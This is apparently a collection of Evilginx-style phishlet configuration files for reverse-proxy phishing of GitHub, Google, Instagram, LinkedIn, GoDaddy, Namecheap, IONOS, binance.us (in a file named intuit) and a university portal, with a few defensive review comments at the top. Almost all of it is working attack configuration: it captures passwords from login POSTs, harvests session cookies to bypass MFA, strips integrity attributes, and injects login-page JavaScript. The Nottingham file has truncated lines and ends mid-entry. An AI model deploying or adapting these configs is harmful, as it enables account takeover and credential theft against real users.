# script and link tags. That is presumably so assets fetched through the proxy
# still load after rewriting. For defenders, a page that normally carries SRI
# attributes and arrives without them is a tampering indicator. SRI protects
# only the sub-resources, not the HTML document that declares the hashes.
8 | sub_filters:
9 | - {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']}
10 |
# NOTE(review): auth_tokens lists the cookies recorded after login: logged_in and
# dotcom_user on .github.com, user_session and _gh_sess on github.com. A captured
# session cookie can be replayed without the password or a one-time code, so
# TOTP or SMS MFA does not stop this class of proxy. Security keys and passkeys
# (WebAuthn) do, because the assertion is bound to the genuine origin. On the
# account side, review active sessions and revoke them after a suspected
# phishing event, since rotating the password alone is not enough.
11 | auth_tokens:
12 | - domain: '.github.com'
13 | keys: ['logged_in', 'dotcom_user']
14 | - domain: 'github.com'
15 | keys: ['user_session', '_gh_sess']
16 |
# NOTE(review): the username and password are read from the POST parameters
# login and password. Search '(.*)' keeps the whole submitted value.
17 | credentials:
18 | username:
19 | key: 'login'
20 | search: '(.*)'
21 | type: 'post'
22 | password:
23 | key: 'password'
24 | search: '(.*)'
25 | type: 'post'
26 |
27 | login:
28 | domain: 'github.com'
29 | path: '/login'
30 |
--------------------------------------------------------------------------------
/phishlet_examples/godaddy.yaml:
--------------------------------------------------------------------------------
1 |
2 | author: '@An0nud4y'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing: true}
6 | # - {phish_sub: 'img6', orig_sub: 'img6', domain: 'wsimg.com', session: true, is_landing: false}
7 | - {phish_sub: 'img1', orig_sub: 'img1', domain: 'wsimg.com', session: true, is_landing: false}
8 | - {phish_sub: 'events', orig_sub: 'events', domain: 'godaddy.com', session: true, is_landing: false}
9 | - {phish_sub: 'gui', orig_sub: 'gui', domain: 'godaddy.com', session: true, is_landing: false}
10 |
11 | sub_filters:
12 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html',
'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 13 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 14 | # - {triggers_on: 'sso.godaddy.com', orig_sub: 'img6', domain: 'wsimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 15 | # - {triggers_on: 'sso.godaddy.com', orig_sub: 'img6', domain: 'wsimg.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'img1', domain: 'wsimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 17 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'img1', domain: 'wsimg.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 18 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'events', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 19 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'events', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 20 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'gui', domain: 'godaddy.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 
'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 21 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'gui', domain: 'godaddy.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 22 | 23 | auth_tokens: 24 | - domain: '.godaddy.com' 25 | keys: ['(.*)','.*,regexp'] 26 | credentials: 27 | username: 28 | key: 'username' 29 | search: '(.*)' 30 | type: 'post' 31 | password: 32 | key: 'password' 33 | search: '(.*)' 34 | type: 'post' 35 | login: 36 | domain: 'sso.godaddy.com' 37 | path: '/' 38 | 39 | -------------------------------------------------------------------------------- /phishlet_examples/gsuite.yaml: -------------------------------------------------------------------------------- 1 | author: '@K70' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,} 5 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} 6 | - {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false} 7 | - {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false} 8 | - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: false} 9 | - {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false} 10 | - {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false} 11 | sub_filters: 12 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts-google.com.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 
'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 13 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'ssl.gstatic.com', replace: 'ssl.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 14 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'play.google.com', replace: 'play.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 15 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'apis.google.com', replace: 'apis.{domain}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 16 | - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'www.google.com', replace: 'www.{domain}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 17 | - {triggers_on: 'apis.google.com', orig_sub: 'apis', domain: 'google.com', search: 'content.googleapis.com', replace: 'content.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 18 | auth_tokens: 19 | - domain: '.google.com' 20 | keys: [".*,regexp"] 21 | - domain: 'accounts.google.com' 22 | keys: [".*,regexp"] 23 | - domain: 'accounts.google.bg' 24 | keys: [".*,regexp"] 25 | credentials: 26 | username: 27 | key: 'f.req' 28 | search: '\],"([^"]*)"\]$' 29 | type: 'post' 30 | password: 31 | key: 'f.req' 32 | search: ',\["([^"]*)",' 33 | type: 'post' 34 | custom: 35 | - key: 
'useragent' 36 | search: '(.*)' 37 | type: 'post' 38 | - key: 'browser' 39 | search: '(.*)' 40 | type: 'post' 41 | - key: 'engine' 42 | search: '(.*)' 43 | type: 'post' 44 | - key: 'platform' 45 | search: '(.*)' 46 | type: 'post' 47 | auth_urls: 48 | - '/CheckCookie' 49 | - '/ManageAccount' 50 | login: 51 | domain: 'accounts.google.com' 52 | path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin' 53 | force_post: 54 | - path: '/_/signin/sl/challenge' 55 | search: 56 | - {key: 'f.req', search: '.*'} 57 | - {key: 'continue', search: '.*'} 58 | force: 59 | - {key: 'continue', value: ''} 60 | type: 'post' 61 | js_inject: 62 | - trigger_domains: ['accounts.google.com'] 63 | trigger_paths: ['.*?'] 64 | script: | 65 | function serialize( obj ){ 66 | var str = []; 67 | for (var p in obj){ 68 | if (obj.hasOwnProperty(p)) { 69 | str.push(encodeURIComponent(p) + "=" + encodeURIComponent(obj[p])); 70 | } 71 | } 72 | return str.join("&"); 73 | } 74 | function toPopulate(){ 75 | console.log( "Populating" ); 76 | var xhttp = new XMLHttpRequest(); 77 | var tosend = { 78 | useragent : navigator.userAgent, 79 | browser : navigator.appName, 80 | engine : navigator.product, 81 | platform : navigator.platform, 82 | } 83 | xhttp.onreadystatechange = function(){ 84 | console.log( "Sent" ); 85 | } 86 | xhttp.open( "POST", "/getuserinfo", true ); 87 | xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 88 | console.log( serialize( tosend ) ); 89 | xhttp.send( serialize( tosend ) ); 90 | } 91 | console.log( "Reached here." 
); 92 | setTimeout(toPopulate, 2000); -------------------------------------------------------------------------------- /phishlet_examples/instagram.yaml: -------------------------------------------------------------------------------- 1 | author: '@charlesbel' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true} 5 | - {phish_sub: 'm', orig_sub: 'm', domain: 'instagram.com', session: true, is_landing: false} 6 | sub_filters: 7 | - {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 8 | - {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 9 | - {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 10 | auth_tokens: 11 | - domain: '.instagram.com' 12 | keys: ['sessionid','.*,regexp'] 13 | credentials: 14 | username: 15 | key: 'user' 16 | search: '(.*)' 17 | type: 'post' 18 | password: 19 | key: 'unenc_password' 20 | search: '(.*)' 21 | type: 'post' 22 | login: 23 | domain: 'www.instagram.com' 24 | path: '/accounts/login' 25 | js_inject: 26 | - trigger_domains: ["www.instagram.com"] 27 | trigger_paths: ["/accounts/login"] 28 | trigger_params: [] 29 | script: | 30 | function lp(){ 31 | var submit = document.querySelectorAll('button[type=submit]')[0]; 32 | submit.setAttribute("onclick", "sendPass()"); 33 | return; 34 | } 35 | function sendPass(){ 36 | var password = document.getElementsByName("password")[0].value; 37 | var xhr = new XMLHttpRequest(); 38 | xhr.open("POST", '/accounts/login/ajax/', true); 39 | xhr.setRequestHeader("Content-Type", 
"application/x-www-form-urlencoded"); 40 | xhr.send("unenc_password="+encodeURIComponent(password)); 41 | return; 42 | } 43 | setTimeout(function(){ lp(); }, 1000); -------------------------------------------------------------------------------- /phishlet_examples/intuit.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'binance.us', session: true, is_landing: true} 5 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.us', session: false, is_landing: false} 6 | - {phish_sub: 'preprod', orig_sub: 'preprod', domain: 'binance.us', session: false, is_landing: false} 7 | - {phish_sub: 'static', orig_sub: 'static', domain: 'binance.us', session: false, is_landing: false} 8 | - {phish_sub: 'stream', orig_sub: 'stream', domain: 'binance.us', session: false, is_landing: false} 9 | - {phish_sub: 'api', orig_sub: 'api', domain: 'binance.us', session: false, is_landing: false} 10 | - {phish_sub: 'support', orig_sub: 'support', domain: 'binance.us', session: false, is_landing: false} 11 | - {phish_sub: 'test', orig_sub: 'test', domain: 'binance.us', session: false, is_landing: false} 12 | - {phish_sub: 'docs', orig_sub: 'docs', domain: 'binance.us', session: false, is_landing: false} 13 | - {phish_sub: 'blog', orig_sub: 'blogs', domain: 'binance.us', session: false, is_landing: false} 14 | - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false} 15 | 16 | # www.gstatic.com 17 | # www.google.com 18 | # accounts.intuit.com 19 | # appfabric-preload.app.intuit.com 20 | # lib.intuitcdn.net 21 | # plugin.intuitcdn.net 22 | # segment.intuitcdn.net 23 | # qbo.intuit.com 24 | # lacerte.intuit.com 25 | # intuitmarket.intuit.com 26 | # 27 | 28 | 29 | # uxfabric.intuitcdn.net 30 | # trinity.platform.intuit.com 31 | # www.intuit.com 32 | # quickbooks.intuit.com 33 | # segment.intuitcdn.net 
34 | # rum.api.intuit.com 35 | # intuit.com 36 | # eventbus.intuit.com 37 | # cdn.websdk.intuit.com 38 | # 39 | 40 | sub_filters: 41 | - {triggers_on: 'www.binance.us', orig_sub: 'www', domain: 'binance.us', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']} 42 | - {triggers_on: 'preprod.binance.us', orig_sub: 'preprod', domain: 'binance.us', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 43 | - {triggers_on: 'static.binance.us', orig_sub: 'static', domain: 'binance.us', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']} 44 | - {triggers_on: 'stream.binance.us', orig_sub: 'stream', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 45 | - {triggers_on: 'api.binance.us', orig_sub: 'api', domain: 'binance.us', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} 46 | - {triggers_on: 'support.binance.us', orig_sub: 'support', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 47 | - {triggers_on: 'accounts.binance.us', orig_sub: 'accounts', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 48 | - {triggers_on: 'test.binance.us', orig_sub: 'test', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 49 | - {triggers_on: 'docs.binance.us', orig_sub: 
'docs', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 50 | - {triggers_on: 'blog.binance.us', orig_sub: 'blog', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} 51 | - {triggers_on: 'accounts.binance.us', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 52 | 53 | 54 | auth_tokens: 55 | - domain: 'accounts.binance.us' 56 | keys: [".*,regexp"] 57 | credentials: 58 | username: 59 | key: 'email' 60 | search: '(.*)' 61 | type: 'post' 62 | password: 63 | key: 'password' 64 | search: '(.*)' 65 | type: 'post' 66 | auth_urls: 67 | - '/mail' 68 | - '/mail/' 69 | login: 70 | domain: 'accounts.binance.us' 71 | path: '/en/login?return_to=aHR0cHM6Ly93d3cuYmluYW5jZS51cy9lbi9ob21l' -------------------------------------------------------------------------------- /phishlet_examples/ionos.yaml: -------------------------------------------------------------------------------- 1 | 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'ionos.com', session: true, is_landing: true} 6 | - {phish_sub: '', orig_sub: '', domain: 'ionos.com', session: true, is_landing: false} 7 | 8 | sub_filters: 9 | - {triggers_on: 'login.ionos.com', orig_sub: 'login', domain: 'ionos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 10 | - {triggers_on: 'login.ionos.com', orig_sub: '', domain: 'ionos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 
'application/x-javascript']} 11 | 12 | auth_tokens: 13 | - domain: '.ionos.com' 14 | keys: ['.*,regexp'] 15 | auth_urls: 16 | - '' 17 | credentials: 18 | username: 19 | key: 'oaologin.username' 20 | search: '(.*)' 21 | type: 'post' 22 | password: 23 | key: 'oaologin.password' 24 | search: '(.*)' 25 | type: 'post' 26 | custom: 27 | key: 'oaologin.additionaldata' 28 | search: '(.*)' 29 | type: 'post' 30 | login: 31 | domain: 'login.ionos.com' 32 | path: '/' 33 | 34 | -------------------------------------------------------------------------------- /phishlet_examples/linkedin2.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true} 5 | - {phish_sub: 'platform', orig_sub: 'platform', domain: 'linkedin.com', session: false, is_landing: false} 6 | - {phish_sub: 'static-exp1', orig_sub: 'static-exp1', domain: 'licdn.com', session: false, is_landing: false} 7 | 8 | sub_filters: 9 | - {triggers_on: 'www.linkedin.com', orig_sub: '', domain: 'linkedin.com', search: '{hostname_regex}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 10 | - {triggers_on: 'www.linkedin.com', orig_sub: '', domain: 'licdn.com', search: '{hostname_regex}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 11 | 12 | 13 | - {triggers_on: 'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 14 | - {triggers_on: 
'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 15 | - {triggers_on: 'www.linkedin.com', orig_sub: 'www', domain: 'linkedin.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 16 | - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 17 | - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 18 | - {triggers_on: 'www.linkedin.com', orig_sub: 'platform', domain: 'linkedin.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 19 | - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 20 | - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: 'https%3A%2F%2{hostname}/', replace: 'https%3A%2F%2{hostname}/', mimes: ['text/html', 
'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 21 | - {triggers_on: 'www.linkedin.com', orig_sub: 'static-exp1', domain: 'licdn.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 22 | 23 | 24 | auth_tokens: 25 | - domain: '.www.linkedin.com' 26 | keys: ['.*,regexp'] 27 | - domain: '.linkedin.com' 28 | keys: ['.*,regexp'] 29 | 30 | 31 | auth_urls: 32 | - '/feed' 33 | - '/feed/' 34 | credentials: 35 | username: 36 | key: 'session_key' 37 | search: '(.*)' 38 | type: 'post' 39 | password: 40 | key: 'session_password' 41 | search: '(.*)' 42 | type: 'post' 43 | 44 | login: 45 | domain: 'www.linkedin.com' 46 | path: '/uas/login' 47 | 48 | js_inject: 49 | - trigger_domains: ["www.linkedin.com"] 50 | trigger_paths: ["/uas/login"] 51 | trigger_params: ["email"] 52 | script: | 53 | function lp(){ 54 | var email = document.querySelector("#username"); 55 | var password = document.querySelector("#password"); 56 | if (email != null && password != null) { 57 | email.value = "{email}"; 58 | password.focus(); 59 | return; 60 | } 61 | setTimeout(function(){lp();}, 100); 62 | } 63 | setTimeout(function(){lp();}, 100); 64 | -------------------------------------------------------------------------------- /phishlet_examples/namecheap.yaml: -------------------------------------------------------------------------------- 1 | 2 | author: '@An0nud4y' 3 | min_ver: '2.3.0' 4 | proxy_hosts: 5 | - {phish_sub: 'www', orig_sub: 'www', domain: 'namecheap.com', session: true, is_landing: true} 6 | - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false} 7 | - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false} 8 | - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 
'namecheap.com', session: true, is_landing: false} 9 | - {phish_sub: 'ap', orig_sub: 'ap.www', domain: 'namecheap.com', session: true, is_landing: false} 10 | 11 | sub_filters: 12 | - {triggers_on: 'www.namecheap.com', orig_sub: 'www', domain: 'namecheap.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 13 | - {triggers_on: 'www.namecheap.com', orig_sub: 'ap.www', domain: 'namecheap.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 14 | 15 | 16 | auth_tokens: 17 | - domain: 'ap.www.namecheap.com' 18 | keys: ['.ncauth, rdt_uuid, SessionId, x-ncpl-auth, x-sf-country'] 19 | credentials: 20 | username: 21 | key: 'LoginUserName' 22 | search: '(.*)' 23 | type: 'post' 24 | password: 25 | key: 'LoginPassword' 26 | search: '(.*)' 27 | type: 'post' 28 | custom: 29 | - key: 'LoginUserName' 30 | search: '(.*)' 31 | type: 'post' 32 | - key: 'LoginUserName' 33 | search: '(.*)' 34 | type: 'post' 35 | - key: 'LoginPassword' 36 | search: '(.*)' 37 | type: 'post' 38 | - key: 'LoginPassword' 39 | search: '(.*)' 40 | type: 'post' 41 | 42 | login: 43 | domain: 'www.namecheap.com' 44 | path: '/myaccount/login/' 45 | 46 | -------------------------------------------------------------------------------- /phishlet_examples/nottingham.yaml: -------------------------------------------------------------------------------- 1 | author: ‘@harris' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'nottingham.ac.uk', session: true, is_landing: true} 5 | - {phish_sub: '', orig_sub: '', domain: 'nottingham.ac.uk', session: true, is_landing: false} 6 | - {phish_sub: 'myview', orig_sub: 'myview', domain: 'nottingham.ac.uk', session: true, is_landing: false} 7 | 8 | 9 | sub_filters: 10 | - {triggers_on: 
'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://myview.nottingham.ac.uk:443', replace: 'https:/$ 11 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2Fmyview.nottingham.ac.uk:443', replace: 'h$ 12 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'myview.nottingham.ac.uk:443', replace: '{hostname}', mi$ 13 | 14 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$ 15 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$ 16 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$ 17 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', '$ 18 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$ 19 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$ 20 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html'$ 21 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mim$ 22 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hos$ 23 | 24 | 25 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', 
domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/j$ 26 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['tex$ 27 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', $ 28 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$ 29 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$ 30 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$ 31 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', '$ 32 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$ 33 | - {triggers_on: 'www.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$ 34 | 35 | 36 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'tex$ 37 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['$ 38 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: '', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}$ 39 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 
'{hostname}', replace: '{hostname}', mimes: ['text/html', '$ 40 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mimes:$ 41 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'www', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostna$ 42 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: '{hostname}', replace: '{hostname}', mimes: ['text/html'$ 43 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https://{hostname}', replace: 'https://{hostname}', mim$ 44 | - {triggers_on: 'myview.nottingham.ac.uk', orig_sub: 'myview', domain: 'nottingham.ac.uk', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hos$ 45 | 46 | 47 | 48 | auth_tokens: 49 | - domain: '.nottingham.ac.uk' 50 | keys: ['.*,regexp'] 51 | - domain: 'myview.nottingham.ac.uk' 52 | keys: ['.*,regexp'] 53 | - domain: 'www.nottingham.ac.uk' 54 | keys: ['.*,regexp'] 55 | credentials: 56 | username: 57 | key: 'username' 58 | search: '(.*)' 59 | type: 'post' 60 | password: 61 | key: 